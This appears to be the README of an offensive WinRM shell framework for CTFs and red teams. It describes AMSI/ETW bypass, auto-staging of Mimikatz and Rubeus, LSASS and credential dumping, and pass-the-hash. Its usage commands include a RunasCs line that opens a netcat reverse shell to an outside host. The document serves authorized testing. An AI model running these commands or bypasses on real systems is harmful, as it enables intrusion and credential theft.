Advanced WinRM Shell for CTFs, Red Teams, and Offensive Research

AWINRM is an operator-focused WinRM framework under active development. Features, macros, and internal behavior may evolve as the tool matures.
Alpha release — experimental automation modules.
Use only where you have explicit written authorization.
AWINRM OPERATOR SHELL
AWINRM was built from real operator struggles inside enterprise Active Directory environments.
While traditional WinRM tooling works, real red-team operations face friction:
- Broken or slow uploads for large binaries
- In-memory execution blocked by AMSI/ETW
- Instability around PowerShell language modes
- Weak automation for enumeration and credential gathering
- IPv6 lateral movement poorly supported
- Repetitive staging steps harming OPSEC
AWINRM directly addresses these issues through its operator-centric workflow system, staging subsystem, and built-in bypass modules.
Designed for:
- CTF challenge assault paths (Kerberoast → lateral movement → LSASS access)
- HTB Pro Labs enterprise engagements
- High fidelity red-team simulations
- Automated AMSI bypass and ETW disruption
- Reliable file staging for large binaries
- Architecture-aware tooling (x86/x64)
- Command macros for AD recon and exploitation
- SOCKS proxy tunneling for pivot operations
- Auto-loot heuristics for credentials, flags, tokens
- Optional banner-based situational awareness
- Stealth upload mode with ADS storage support
- Built-in IPv6 probing and fallback support
- Workflow persistence and command history logging
Output is stored locally in the loot/ directory for offline analysis.
AWINRM features two situational awareness modes:
Minimal banner (default):
• Fast execution in CTF environments
• Summarizes privileges, EDR state, local flags
Expand banner mode:
Provides high depth assessment including:
- Live SQL/MSSQL instance detection
- Kerberos misconfiguration checks
- Patch state indicators
- Lateral movement suggestions
- Trust relationship scan summary
- Privilege escalation scoring
Run the expanded banner like this:

```
ruby bin/evil-ctf.rb -i 10.10.10.10 -u Administrator -p Passw0rd! --banner expanded
```

Operators receive active decision guidance for next-step exploitation.
AWINRM provides automated in-memory defenses against common blue-team controls:
- AMSI bypass using runtime patching
- ETW neutralization against script tracing
- Avoids touching disk or modifying registry
- Supports fallback manual execution
- Updated for modern Windows 10 / Windows Server builds
Execution can be toggled or invoked by operator preference.
AWINRM automatically deploys common offensive tools for credential harvesting, domain enumeration, and privilege escalation.
Supported tool families:
- SharpHound
- Rubeus
- PowerView / PowerSploit modules
- Mimikatz
- WinPEAS
- Seatbelt
- Inveigh
- ProcDump
- RunasCs
- SSH / tunneling helpers
- Nishang scripts
RunasCs is a C# implementation of RunAs for user impersonation and UAC bypass. After staging RunasCs.exe to the remote host, you can use it as follows:

Spawn Process with Network Credentials:

```
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'
```

Spawn Process with Logon:

```
.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORT
```

See the RunasCs GitHub for more usage details and options.
Features:
- Architecture aware staging
- Chunked or XOR-encoded uploads
- Alternate Data Stream support
- Randomized filenames for OPSEC
- Tool registry with version mapping
Artifacts are stored in:

```
loot/creds.json
loot/loot.txt
```
Streamlined workflows to accelerate exploitation:
- Kerberoasting automation
- Domain recon bundles
- Credential and token dumping
- LSASS extraction and secure download
- SharpHound collection
- SOCKS tunneling initialization
- Local and domain privilege assessment
- Automated discovery of lateral access paths
Designed for both rapid CTF wins and full domain takeover scenarios.
AWINRM requires Ruby 3.0+ and Bundler.
```
bundle install
```

```
# Gemfile (updated for Ruby 3.2+)
source 'https://rubygems.org'
gem 'winrm', '~> 2.3.9'          # WinRM client, fully compatible with Ruby 3.x
gem 'socksify', '~> 1.8.1'       # TCP-SOCKS proxy support
gem 'concurrent-ruby', '~> 1.2.0'
gem 'net-smtp', '~> 0.3.4'
gem 'rubyzip', '~> 2.0'
# Bundler itself
gem 'bundler', '~> 2.4.0'
```
Ruby’s standard library covers the remaining imports (optparse, ipaddr, socket, fileutils, etc.).
```
ruby bin/evil-ctf.rb -i <target_ip> -u <username> -p <password>
```

AWINRM supports direct connections to Windows hosts over IPv6. For reliable IPv6 connectivity, follow these steps:
1. Map IPv6 Address to Hostname. Add the IPv6 address and desired hostname to `/etc/hosts` using the built-in CLI option:

   ```
   sudo ruby evil-ctf.rb --ipv6 <IPv6_address>,<hostname>
   # Example:
   sudo ruby evil-ctf.rb --ipv6 fd00:1234:5678::10,Old-W10
   ```

   This will append a line to `/etc/hosts` mapping the IPv6 address to the hostname (with backup and idempotency).

2. Connect Using the Hostname. After mapping, connect to the target using the hostname:

   ```
   ruby evil-ctf.rb -i Old-W10 -u <username> -p <password>
   ```

   AWINRM will resolve the hostname to the IPv6 address and connect over IPv6 if the target is listening.

3. Verifying the IPv6 Connection.
   - On the Windows target, run `netstat -an | findstr 5985` or `Get-NetTCPConnection | Where-Object { $_.LocalPort -eq 5985 }` and look for connections from your Linux IPv6 address.
   - On Linux, run `ss -6 dst <IPv6_address>` or `netstat -an | grep <IPv6_address>` during the connection attempt.

Notes:
- If you use a zone index (e.g., `fd00:1234:5678::10%enp130s0`), only the address part is mapped in `/etc/hosts`.
- You can repeat the mapping for multiple hosts as needed.
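The `/etc/hosts` mapping step above, written out as an added Ruby example that is not AWINRM's own code: it strips a zone index, rejects anything that is not an IPv6 address, backs the hosts file up and skips a mapping that is already present, so repeated runs are idempotent. The function names `normalize_ipv6` and `map_ipv6_host`, the `hosts_path:` keyword and the `.bak` backup suffix are assumptions made for this illustration.

```ruby
require 'ipaddr'
require 'fileutils'
require 'tempfile'

# Hypothetical helper (not AWINRM's own code) reproducing the documented --ipv6
# behaviour: map an IPv6 address to a hostname in /etc/hosts, backing the file
# up first and never writing the same mapping twice.

# Strip a zone index such as "%enp130s0": only the address part is mapped.
# Raises ArgumentError for anything that is not a valid IPv6 address.
def normalize_ipv6(addr)
  bare = addr.to_s.split('%', 2).first.strip
  ip = IPAddr.new(bare)
  raise ArgumentError, "not an IPv6 address: #{addr}" unless ip.ipv6?
  ip.to_s
end

# Returns :already_present if hosts_path already maps ip -> hostname; otherwise
# copies the file to "<hosts_path>.bak", appends the mapping and returns :added.
def map_ipv6_host(addr, hostname, hosts_path: '/etc/hosts')
  ip = normalize_ipv6(addr)
  unless hostname.match?(/\A[A-Za-z0-9][A-Za-z0-9.-]{0,252}\z/)
    raise ArgumentError, "invalid hostname: #{hostname}"
  end
  lines = File.exist?(hosts_path) ? File.readlines(hosts_path, chomp: true) : []
  present = lines.any? do |line|
    fields = line.sub(/#.*/, '').split        # drop comments, split on whitespace
    next false if fields.length < 2
    begin
      # Compare in canonical form so "fd00:1234:5678:0::10" still matches.
      IPAddr.new(fields[0]).to_s == ip && fields[1..].any? { |h| h.casecmp?(hostname) }
    rescue IPAddr::Error
      false                                    # malformed line, cannot match
    end
  end
  return :already_present if present

  FileUtils.cp(hosts_path, "#{hosts_path}.bak") if File.exist?(hosts_path)
  File.open(hosts_path, 'a') { |f| f.puts "#{ip}\t#{hostname}" }
  :added
end

if $PROGRAM_NAME == __FILE__
  # Stand-alone demo against a scratch file instead of the real /etc/hosts.
  scratch = Tempfile.new('hosts')
  scratch.puts "127.0.0.1\tlocalhost"
  scratch.close
  puts map_ipv6_host('fd00:1234:5678::10%enp130s0', 'Old-W10', hosts_path: scratch.path)
  puts map_ipv6_host('fd00:1234:5678::10', 'Old-W10', hosts_path: scratch.path)
end
```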
EvilCTF supports uploading files directly to Windows Alternate Data Streams (ADS) for stealth and OPSEC. This allows you to store data in hidden streams attached to files.
1. Start a session:

   ```
   ruby evil-ctf.rb -i <target_ip> -u <username> -p <password>
   ```

2. Enter the file operations menu with `fileops`.
3. Choose "Upload file" and specify your local file.
4. For the remote destination, use the format `C:\Users\Public\target.txt:adsname`. This uploads your file into the ADS named `adsname` attached to `target.txt`.

To read the stream back on the target system, use PowerShell:

```
Get-Content -Path 'C:\Users\Public\target.txt:adsname'
```

For binary files:

```
[System.IO.File]::ReadAllBytes('C:\Users\Public\target.txt:adsname')
```

Or download the ADS using EvilCTF by specifying the full ADS path in the fileops menu.

Note: The base file (e.g., `target.txt`) must exist before uploading to its ADS.
Basic authentication:

```
ruby bin/evil-ctf.rb -i 10.10.10.10 -u Administrator -p Welcome1!
```

Pass-the-Hash:

```
ruby evil-ctf.rb -i HOST -u USER -H NTLM_HASH
```

TLS encrypted transport:

```
ruby evil-ctf.rb -i HOST --ssl -u USER -p PASS
```

SOCKS proxy pivot:

```
ruby evil-ctf.rb -i HOST --socks 127.0.0.1:1080 -u USER -p PASS
```

Execute staging macro:

```
tool all
```

Dump credentials:

```
dump_creds
```

Domain reconnaissance:

```
dom_enum
```

Operators can chain execution across multiple remote hosts for campaign automation.
```
AWINRM
├── bin/evil-ctf.rb            CLI entry point
├── lib/evil_ctf/banner.rb     Banner and recon information
├── lib/evil_ctf/enums.rb      Enumeration systems
├── lib/evil_ctf/session.rb    Interactive shell and workflow engine
├── lib/evil_ctf/tools.rb      Tool registry and auto staging rules
├── lib/evil_ctf/uploader.rb   File transfer implementation
├── loot/                      Local credential and artifact storage
├── profiles/                  YAML configuration for stealth workflows
├── README.md                  Framework documentation
└── LICENSE                    Legal terms
```
| Tactic | Technique | ID | Purpose in AWINRM |
|---|---|---|---|
| Execution | PowerShell | T1059.001 | Remote in memory command execution |
| Execution | In-Memory Execution | T1620 | Run payloads without touching disk |
| Lateral Movement | WinRM | T1021.006 | Movement across Active Directory hosts |
| Credential Access | Credential Dumping | T1003 | Extract stored secrets for escalation |
| Credential Access | LSASS Memory Dumping | T1003.001 | Token/credential recovery from LSASS |
| Credential Access | Pass-the-Hash | T1550.002 | Authenticate without cleartext passwords |
| Credential Access | Kerberoasting | T1558.003 | Harvest TGS tickets for offline cracking |
| Discovery | Account Discovery | T1087 | Identify exploitable users and roles |
| Discovery | Network/Host Discovery | T1016 | Identify lateral access opportunities |
| Command and Control | Application Protocol: HTTPS | T1071.001 | Covert, encrypted operator traffic |
| Defense Evasion | AMSI Bypass | T1562.001 | Block script scanning and signature checks |
| Defense Evasion | ETW Disable | T1562.002 | Prevent telemetry capture/analysis |
Enhancements are welcome on:
- stealth workflow automation
- advanced credential extraction techniques
- stability enhancements
- tools to be autostaged
All pull requests must include full documentation and test coverage.
AWINRM draws initial inspiration from the WinRM interface established by Evil-WinRM by @Hackplayers.
This project expands upon the baseline WinRM interaction model, adding modular tooling, macro workflows, AMSI/ETW bypass automation, and operator-focused enhancements.
Credit is due to:
- Original Evil-WinRM authors
- BloodHound / SharpHound developers
- GhostPack maintainers
- PowerShellMafia (PowerView/PowerSploit)
- Inveigh and Nishang maintainers
- Sysinternals (ProcDump)
AWINRM is provided strictly for:
- authorized penetration testing
- approved red-team missions
- CTF participation
- security improvement research
Unauthorized deployment on systems without explicit permission is illegal.
All responsibility for ethical and lawful use lies solely with the operator.